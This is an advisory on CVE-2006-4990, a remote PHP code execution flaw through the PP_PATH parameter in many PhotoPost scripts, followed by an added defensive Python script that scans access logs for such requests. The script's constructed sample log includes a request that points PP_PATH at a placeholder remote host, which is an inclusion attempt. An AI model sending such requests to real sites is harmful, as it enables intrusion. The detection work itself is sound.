Photopost · Photopost · CVE-2006-4990
**Name of the Vulnerable Software and Affected Versions**
PhotoPost (affected versions not specified)
**Description**
The issue allows remote attackers to execute arbitrary PHP code via a URL in the `PP_PATH` parameter in multiple PHP files, including "addfav.php", "adm-admlog.php", "adm-approve.php", "adm-backup.php", "adm-cats.php", "adm-cinc.php", "adm-db.php", "adm-editcfg.php", "adm-inc.php", "adm-index.php", "adm-modcom.php", "adm-move.php", "adm-options.php", "adm-order.php", "adm-pa.php", "adm-photo.php", "adm-purge.php", "adm-style.php", "adm-templ.php", "adm-userg.php", "adm-users.php", "bulkupload.php", "cookies.php", "comments.php", "ecard.php", "editphoto.php", "register.php", "showgallery.php", "showmembers.php", "useralbums.php", "uploadphoto.php", "search.php", and "adm-menu.php".
**Recommendations**
As a temporary workaround, consider restricting access to the `PP_PATH` parameter in the affected PHP files until a patch is available.
Restrict access to the vulnerable PHP files to minimize the risk of exploitation.
Avoid using the `PP_PATH` parameter in the affected files until the issue is resolved.
At the moment, there is no information about a newer version that contains a fix for this vulnerability.
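To see whether the affected scripts are already receiving requests that set the parameter, the following added example (not PhotoPost code and not part of the original advisory) scans web access-log lines for `PP_PATH` sent to the files listed above. The log lines are constructed, and the combined log format and the `classify`/`scan` helper names are assumptions of this example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Script names copied from the advisory's list of affected files.
AFFECTED = set("""
addfav.php adm-admlog.php adm-approve.php adm-backup.php adm-cats.php
adm-cinc.php adm-db.php adm-editcfg.php adm-inc.php adm-index.php
adm-modcom.php adm-move.php adm-options.php adm-order.php adm-pa.php
adm-photo.php adm-purge.php adm-style.php adm-templ.php adm-userg.php
adm-users.php bulkupload.php cookies.php comments.php ecard.php
editphoto.php register.php showgallery.php showmembers.php useralbums.php
uploadphoto.php search.php adm-menu.php
""".split())

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCHEME = re.compile(r"^[a-z][a-z0-9+.-]+:", re.I)  # http:, ftp:, data:, ...

def classify(line):
    """Return 'remote' (PP_PATH holds a URL), 'param' (PP_PATH supplied) or None."""
    m = REQUEST.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    script = target.path.rsplit("/", 1)[-1].lower()
    if script not in AFFECTED:
        return None
    # parse_qsl percent-decodes names and values once, as the web server would.
    values = [v for k, v in parse_qsl(target.query, keep_blank_values=True)
              if k == "PP_PATH"]
    if any(SCHEME.match(v.strip()) for v in values):
        return "remote"
    return "param" if values else None

# Constructed sample lines (documentation IP ranges, placeholder host).
# Access logs record only the query string, not POST bodies or cookies.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /photopost/showgallery.php?cat=500 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "GET /photopost/addfav.php?PP_PATH=http%3A%2F%2Fexample.invalid%2Finc HTTP/1.1" 200 312',
    '192.0.2.44 - - [01/Jan/2024:10:00:09 +0000] "GET /photopost/adm-menu.php?PP_PATH=./ HTTP/1.1" 200 90',
    '192.0.2.51 - - [01/Jan/2024:10:00:12 +0000] "GET /blog/index.php?PP_PATH=ftp://example.invalid/ HTTP/1.1" 404 0',
]

def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    return [(n, v) for n, l in enumerate(lines, 1) if (v := classify(l))]

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(f"line {number}: {verdict}")
```

Lines flagged `remote` carry a URL in the parameter and match the advisory's description; lines flagged `param` supply the parameter with a non-URL value and are worth reviewing before access to the files is restricted.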